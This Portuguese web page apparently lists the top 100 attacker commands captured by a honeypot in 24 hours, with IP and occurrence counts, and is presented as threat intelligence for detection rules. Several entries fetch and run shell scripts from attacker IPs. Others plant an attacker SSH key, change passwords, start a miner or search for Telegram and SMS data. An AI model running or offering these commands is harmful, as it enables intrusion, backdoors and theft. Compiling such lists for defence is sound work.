Atualizado: fevereiro de 2026
Top 100 Comandos Maliciosos
Os comandos mais executados por atacantes apos obter acesso ao sistema. Util para deteccao de intrusoes e resposta a incidentes.
15.940 comandos em 24h
1.
$
Enter new UNIX password:455 IPs1265x
2.
$
lockr -ia .ssh534 IPs867x
3.
$
cd ~; chattr -ia .ssh; lockr -ia .ssh476 IPs717x
4.
$
uname -a457 IPs701x
5.
$
cat /proc/cpuinfo | grep name | wc -l462 IPs688x
6.
$
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~462 IPs686x
7.
$
uname -m450 IPs676x
8.
$
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'459 IPs674x
9.
$
uname450 IPs672x
10.
$
crontab -l446 IPs669x
11.
$
whoami449 IPs669x
12.
$
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'452 IPs668x
13.
$
cat /proc/cpuinfo | grep model | grep name | wc -l437 IPs655x
14.
$
top439 IPs652x
15.
$
lscpu | grep Model429 IPs648x
16.
$
w438 IPs647x
17.
$
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'439 IPs635x
18.
$
which ls435 IPs632x
19.
$
ls -lh $(which ls)408 IPs568x
20.
$
uname -s -v -n -m 2 > /dev/null109 IPs339x
21.
$
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version101 IPs300x
22.
$
cat /proc/uptime 2 > /dev/null | cut -d. -f138 IPs184x
23.
$
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;131 IPs135x
24.
$
uname -m 2 > /dev/null38 IPs95x
25.
$
/bin/./uname -s -v -n -r -m16 IPs49x
26.
$
uname -s -v -n -r -m14 IPs30x
27.
$
then4 IPs11x
28.
$
if [ [ ! -d ${HOME}/.ssh ] ]4 IPs11x
29.
$
nproc4 IPs10x
30.
$
echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"2 IPs9x
31.
$
pm path com.ufo.miner4 IPs8x
32.
$
echo SCANNER_TEST7 IPs7x
33.
$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -qO- http://139.59.119.89/ohshit.sh | sh; curl -s http://139.59.119.89/ohshit.sh | sh; wget http://139.59.119.89/ohshit.sh -O ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 139.59.119.89 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 139.59.119.89; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 139.59.119.89 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh 7 IPs7x
34.
$
rm -rf /data/local/tmp/*2 IPs6x
35.
$
cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android3 IPs5x
36.
$
fi2 IPs5x
37.
$
cd /data/local/tmp 2>/dev/null||cd /tmp 2>/dev/null||cd /cache;rm -f kla.sh;(wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||nc 45.148.120.23 3342 >kla.sh 2>/dev/null);[ -s kla.sh ]&&chmod +x kla.sh 2>/dev/null&&nohup sh kla.sh tbk >/dev/null 2>&1 &2 IPs4x
38.
$
Accept-Encoding: gzip1 IPs4x
39.
$
/ip cloud print3 IPs4x
40.
$
rm -f /data/local/tmp/ufo.apk3 IPs4x
41.
$
am start -n com.ufo.miner/com.example.test.MainActivity2 IPs4x
42.
$
ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*4 IPs4x
43.
$
ps | grep trinity2 IPs4x
44.
$
echo Hi | cat -n4 IPs4x
45.
$
/data/local/tmp/nohup /data/local/tmp/trinity2 IPs3x
46.
$
uname -s -m3 IPs3x
47.
$
chmod 0755 /data/local/tmp/nohup2 IPs3x
48.
$
chmod 0755 /data/local/tmp/trinity2 IPs3x
49.
$
/data/local/tmp/nohup su -c /data/local/tmp/trinity2 IPs3x
50.
$
locate D877F783D5D3EF8Cs3 IPs3x
51.
$
ifconfig3 IPs3x
52.
$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:34029/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:34029/arm7 -o arm7; chmod 777 arm7; ./arm72 IPs2x
53.
$
cd /data/local/tmp/; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; busybox curl http://140.233.190.82/cat.sh; sh cat.sh2 IPs2x
54.
$
cd /data/local/tmp/; busybox wget http://130.12.180.124/rq0anbhkd976/assets/js/o5a0j5tug8?token=PeOtaCY5NmzmOSDVm0BX9UDM8lJijstK; chmod 777 o5a0j5tug8; ./o5a0j5tug81 IPs2x
55.
$
system1 IPs2x
56.
$
cd /data/local/tmp && busybox wget http://130.12.180.20:36695/dlr.arm7 -O arm7 2>/dev/null || curl -s http://130.12.180.20:36695/dlr.arm7 -o arm7 2>/dev/null && chmod 777 arm7 2>/dev/null && ./arm7; chmod 777 dvrHelper;./dvrHelper route1 IPs2x
57.
$
wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh2 IPs2x
58.
$
Accept: */*1 IPs2x
59.
$
cat /proc/cpuinfo2 IPs2x
60.
$
shell1 IPs2x
61.
$
q1 IPs2x
62.
$
ps | grep xig1 IPs2x
63.
$
ps -ef | grep '[Mm]iner'2 IPs2x
64.
$
pm install /data/local/tmp/ufo.apk1 IPs2x
65.
$
ps aux | head -102 IPs2x
66.
$
ps | grep '[Mm]iner'2 IPs2x
67.
$
Connection: keep-alive1 IPs2x
68.
$
echo -e "Hadoop\nhFRCroxssY1h\nhFRCroxssY1h"|passwd|bash1 IPs2x
69.
$
echo -e "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50"|passwd|bash1 IPs2x
70.
$
echo "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50\n"|passwd1 IPs2x
71.
$
echo "root:jL1LzwxX7JxA"|chpasswd|bash2 IPs2x
72.
$
Accept-Encoding: gzip, deflate1 IPs2x
73.
$
echo "123321\nRUpeh9tuqw3v\nRUpeh9tuqw3v\n"|passwd1 IPs1x
74.
$
echo "123321\nKN51pmeeHHUv\nKN51pmeeHHUv\n"|passwd1 IPs1x
75.
$
echo "123321\nDjHRSyQ1EPdO\nDjHRSyQ1EPdO\n"|passwd1 IPs1x
76.
$
echo "123321\n4SI1mMl74HlR\n4SI1mMl74HlR\n"|passwd1 IPs1x
77.
$
arch_info=$(uname -m); cpu_count=$(nproc); echo -e "SP2NOvnB\nSP2NOvnB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1 IPs1x
78.
$
echo "123123\nP1OUW6T29tS6\nP1OUW6T29tS6\n"|passwd1 IPs1x
79.
$
echo "123123123\nwFvHhFrIHxtg\nwFvHhFrIHxtg\n"|passwd1 IPs1x
80.
$
echo "123123123\nmXEz2gAp8d4V\nmXEz2gAp8d4V\n"|passwd1 IPs1x
81.
$
echo "123!@#$\nfZ1nfmnNzyUW\nfZ1nfmnNzyUW\n"|passwd1 IPs1x
82.
$
arch_info=$(uname -m); cpu_count=$(nproc); echo -e "L435vfVF\nL435vfVF" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1 IPs1x
83.
$
echo "123!@#$\nEzP2gX7rk5b5\nEzP2gX7rk5b5\n"|passwd1 IPs1x
84.
$
echo "121212\nhUxxa3cXY2Mb\nhUxxa3cXY2Mb\n"|passwd1 IPs1x
85.
$
echo "121212\nfJsQEZM40Eca\nfJsQEZM40Eca\n"|passwd1 IPs1x
86.
$
echo "121212\n0MlnpYmDAiQb\n0MlnpYmDAiQb\n"|passwd1 IPs1x
87.
$
echo "111\nWyca6qXhOXbT\nWyca6qXhOXbT\n"|passwd1 IPs1x
88.
$
echo "123456\nvgHLHDPXKlOk\nvgHLHDPXKlOk\n"|passwd1 IPs1x
89.
$
echo "111\n3ynuIbVmzNZc\n3ynuIbVmzNZc\n"|passwd1 IPs1x
90.
$
echo "123456\noxtqEhEFdMOn\noxtqEhEFdMOn\n"|passwd1 IPs1x
91.
$
echo "123456\ngnmXRaT5TcSS\ngnmXRaT5TcSS\n"|passwd1 IPs1x
92.
$
echo "111111\nBlcbyJCuNf89\nBlcbyJCuNf89\n"|passwd1 IPs1x
93.
$
echo "111111\n89Oo92DtFfPG\n89Oo92DtFfPG\n"|passwd1 IPs1x
94.
$
cat /proc/mounts; /bin/busybox WYJYX1 IPs1x
95.
$
arch_info=$(uname -m); cpu_count=$(nproc); echo -e "GhheRrmj\nGhheRrmj" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1 IPs1x
96.
$
echo "123456\nhNPj5SOwsnGE\nhNPj5SOwsnGE\n"|passwd1 IPs1x
97.
$
echo "123456\nfQRbK99JMwea\nfQRbK99JMwea\n"|passwd1 IPs1x
98.
$
echo "123456\nuD0td0mfcHbY\nuD0td0mfcHbY\n"|passwd1 IPs1x
99.
$
echo "123456\ndLTxtqoO7B3l\ndLTxtqoO7B3l\n"|passwd1 IPs1x
100.
$
echo "123456\nc14JQyxbxSnu\nc14JQyxbxSnu\n"|passwd1 IPs1x
Reconhecimento
uname, whoami, cat /etc/passwd
Download
wget, curl, tftp
Persistencia
crontab, chmod, chattr
Mov. Lateral
ssh, scp, ping
Uso para Deteccao
Estes comandos podem ser usados para criar regras de deteccao em SIEM, IDS/IPS e sistemas de monitoramento. Monitore estes padroes em seus logs para detectar intrusoes.